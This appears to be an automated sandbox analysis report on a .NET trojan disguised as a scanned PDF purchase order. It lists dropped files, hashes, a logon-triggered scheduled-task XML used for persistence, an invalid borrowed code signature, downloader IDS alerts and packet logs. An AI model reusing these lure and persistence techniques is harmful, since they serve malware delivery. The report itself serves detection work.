Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Local\Temp\tmpD080.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\QeSBxb.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1579
Entropy (8bit):	5.106801165549276
Encrypted:	false
SSDEEP:	24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtcxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTcv
MD5:	01B91296F5833DCCD5611DA4973FF3D0
SHA1:	9C2CBAE87B70F817DD4ACF46781C2B62D798DA53
SHA-256:	A422C7FB747314414CE1680FCF1067EC9CDBEF14C1A304B5B0FA7A9BF97DC785
SHA-512:	C3454E1FCD6B193AF68355E99CEB87337F7D70BC740715A599B964C7FC7B170F587EB6E697B55FC6FE64391256056BF747DA2D9C846585A97512A8819415D2A9
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

C:\Users\user\AppData\Roaming\QeSBxb.exe

Download File

Process:	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	840712
Entropy (8bit):	7.85489366422345
Encrypted:	false
SSDEEP:	12288:zbedZeA56A4KUwU2dEa4oDr2rxR5NiYrDkhNSOG6BgKBizbNEW0JTWxH+odSheub:75wUWEa4iU8wDINnenL/5twheu35wq
MD5:	D8DAEB11E006370F3B454DF74C382CED
SHA1:	3351AF8F5627D4DF174D4C659391A40D9563CA37
SHA-256:	7B57E6494BB05F09E8A09A69B3C9F28239FE18CB469D223826C95BEE2D650197
SHA-512:	D57FE6E72ACBBB577C9B4DD36A53367A4D0CADFDE7E32C036CAA7ADFFD01AE021BAA8E2BEFF7BBF06FB3927C0B74F84725F0714D05B7ED1E81E1F5A5B258FB86
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^}.g................................. ........@.. ....................................@....................................W........................6........................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......\|=..Xs...........................................................0..A....... T........%.4...(.....5... 6........%.!...(....."...(.........&.....s....}......}.....(.....(.....(.........&....0..........~5.......E....x...q...\...F.......6...x....{....{@... R... h...(...+. 9.Cz.(.... .... ....(...+.. ..... p...Y.+..,.. 7.... U...Y.+..+..{....{@...o....(......8f........&...0...............E................;....................... .... ....(......,....+..+..{....{@...

C:\Users\user\AppData\Roaming\QeSBxb.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.85489366422345
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exe
File size:	840'712 bytes
MD5:	d8daeb11e006370f3b454df74c382ced
SHA1:	3351af8f5627d4df174d4c659391a40d9563ca37
SHA256:	7b57e6494bb05f09e8a09a69b3c9f28239fe18cb469d223826c95bee2d650197
SHA512:	d57fe6e72acbbb577c9b4dd36a53367a4d0cadfde7e32c036caa7adffd01ae021baa8e2beff7bbf06fb3927c0b74f84725f0714d05b7ed1e81e1f5a5b258fb86
SSDEEP:	12288:zbedZeA56A4KUwU2dEa4oDr2rxR5NiYrDkhNSOG6BgKBizbNEW0JTWxH+odSheub:75wUWEa4iU8wDINnenL/5twheu35wq
TLSH:	4605128DBA539A30CA5C1F3BC4039644C7F7D422D2A6E61B18C919F64F5D7A9C04AF8B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^}.g................................. ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4cb12e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x671A7D5E [Thu Oct 24 17:01:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/11/2018 01:00:00 09/11/2021 00:59:59
Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcb0d4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xcc000	0x800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xc9e00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xce000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc9134	0xc9200	f90ae51628faf20819ce4eac4b54f77e	False	0.9215824561062772	data	7.862440033564903	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xcc000	0x800	0x800	fde212614aa7f5d96014b302983008a0	False	0.33984375	data	3.489310162709601	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xce000	0xc	0x200	f7e3ce9f95a1fce48804d15a5c5ba7fd	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xcc090	0x3a0	data			0.4224137931034483
RT_MANIFEST	0xcc440	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-25T09:17:11.331466+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49710	132.226.247.73	80	TCP
2024-10-25T09:17:13.033043+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49710	132.226.247.73	80	TCP
2024-10-25T09:17:13.705596+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49713	188.114.97.3	443	TCP
2024-10-25T09:17:14.642211+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49716	132.226.247.73	80	TCP
2024-10-25T09:17:14.829730+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49714	132.226.247.73	80	TCP
2024-10-25T09:17:16.032825+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49714	132.226.247.73	80	TCP
2024-10-25T09:17:16.298451+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49719	132.226.247.73	80	TCP
2024-10-25T09:17:16.658848+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49720	188.114.97.3	443	TCP
2024-10-25T09:17:17.016512+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49721	188.114.97.3	443	TCP
2024-10-25T09:17:17.579669+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49722	132.226.247.73	80	TCP
2024-10-25T09:17:17.990967+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49723	132.226.247.73	80	TCP
2024-10-25T09:17:19.611042+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49727	132.226.247.73	80	TCP
2024-10-25T09:17:20.832277+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49728	188.114.97.3	443	TCP
2024-10-25T09:17:24.208224+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49736	188.114.97.3	443	TCP
2024-10-25T09:17:24.257516+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49738	188.114.97.3	443	TCP
2024-10-25T09:17:27.564925+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49749	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 25, 2024 09:17:10.054889917 CEST	49710	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:10.060461998 CEST	80	49710	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:10.061304092 CEST	49710	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:10.061732054 CEST	49710	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:10.067106009 CEST	80	49710	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:10.927773952 CEST	80	49710	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:10.935897112 CEST	49710	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:10.941337109 CEST	80	49710	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:11.194910049 CEST	80	49710	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:11.331465960 CEST	49710	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:11.614881992 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:11.614938021 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:11.615001917 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:11.684637070 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:11.684705973 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:12.314156055 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:12.314244986 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:12.336209059 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:12.336260080 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:12.337460995 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:12.392198086 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:12.483827114 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:12.531332016 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:12.622348070 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:12.622586966 CEST	443	49711	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:12.622644901 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:12.651175022 CEST	49711	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:12.662090063 CEST	49710	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:12.668327093 CEST	80	49710	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:12.921621084 CEST	80	49710	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:12.940963030 CEST	49713	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:12.941010952 CEST	443	49713	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:12.941104889 CEST	49713	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:12.941428900 CEST	49713	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:12.941448927 CEST	443	49713	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:13.033042908 CEST	49710	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:13.416578054 CEST	49714	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:13.549030066 CEST	80	49714	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:13.549499989 CEST	49714	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:13.550790071 CEST	49714	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:13.554300070 CEST	443	49713	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:13.559391975 CEST	80	49714	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:13.566205025 CEST	49713	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:13.566224098 CEST	443	49713	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:13.705605030 CEST	443	49713	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:13.705765009 CEST	443	49713	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:13.705907106 CEST	49713	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:13.709229946 CEST	49713	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:13.714411974 CEST	49710	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:13.716495037 CEST	49716	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:13.720566988 CEST	80	49710	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:13.720812082 CEST	49710	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:13.721959114 CEST	80	49716	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:13.722101927 CEST	49716	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:13.724272013 CEST	49716	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:13.729803085 CEST	80	49716	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:14.416539907 CEST	80	49714	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:14.420986891 CEST	49714	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:14.426501989 CEST	80	49714	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:14.589092016 CEST	80	49716	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:14.590595007 CEST	49717	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:14.590639114 CEST	443	49717	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:14.590771914 CEST	49717	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:14.591067076 CEST	49717	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:14.591079950 CEST	443	49717	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:14.642210960 CEST	49716	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:14.680291891 CEST	80	49714	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:14.729947090 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:14.730037928 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:14.730124950 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:14.737709999 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:14.737746954 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:14.829730034 CEST	49714	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:15.196532011 CEST	443	49717	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.198767900 CEST	49717	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.198857069 CEST	443	49717	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.338774920 CEST	443	49717	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.338891983 CEST	443	49717	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.339067936 CEST	49717	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.366333961 CEST	49717	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.375575066 CEST	49716	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:15.377680063 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:15.381948948 CEST	80	49716	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:15.382091999 CEST	49716	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:15.383497000 CEST	80	49719	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:15.383579016 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:15.383764029 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:15.386337042 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.386420965 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.387913942 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.387923956 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.388310909 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.389435053 CEST	80	49719	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:15.473711967 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.478657961 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.519366026 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.635252953 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.635519981 CEST	443	49718	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.635705948 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.640130043 CEST	49718	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.646193027 CEST	49714	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:15.651576042 CEST	80	49714	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:15.904947996 CEST	80	49714	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:15.907663107 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.907702923 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:15.909478903 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.909893036 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:15.909914970 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:16.032824993 CEST	49714	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:16.256469011 CEST	80	49719	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:16.258132935 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:16.258193970 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:16.258424997 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:16.258889914 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:16.258902073 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:16.298450947 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:16.517643929 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:16.520668983 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:16.520688057 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:16.658687115 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:16.658797979 CEST	443	49720	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:16.658973932 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:16.659624100 CEST	49720	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:16.663239956 CEST	49714	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:16.664408922 CEST	49722	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:16.669044971 CEST	80	49714	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:16.669177055 CEST	49714	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:16.669790030 CEST	80	49722	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:16.669944048 CEST	49722	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:16.670674086 CEST	49722	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:16.675995111 CEST	80	49722	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:16.877142906 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:16.879004955 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:16.879035950 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:17.016479969 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:17.016587019 CEST	443	49721	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:17.016643047 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:17.017661095 CEST	49721	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:17.022304058 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:17.023152113 CEST	49723	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:17.028160095 CEST	80	49719	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:17.028235912 CEST	49719	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:17.028608084 CEST	80	49723	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:17.028688908 CEST	49723	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:17.028789043 CEST	49723	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:17.034145117 CEST	80	49723	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:17.524621964 CEST	80	49722	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:17.526245117 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:17.526283026 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:17.526348114 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:17.526654005 CEST	49724	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:17.526669025 CEST	443	49724	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:17.579668999 CEST	49722	80	192.168.2.8	132.226.247.73
Oct 25, 2024 09:17:17.901664972 CEST	80	49723	132.226.247.73	192.168.2.8
Oct 25, 2024 09:17:17.903333902 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:17.903379917 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:17.903562069 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:17.903871059 CEST	49725	443	192.168.2.8	188.114.97.3
Oct 25, 2024 09:17:17.903889894 CEST	443	49725	188.114.97.3	192.168.2.8
Oct 25, 2024 09:17:17.990967035 CEST	49723	80	192.168.2.8	132.226.247.73
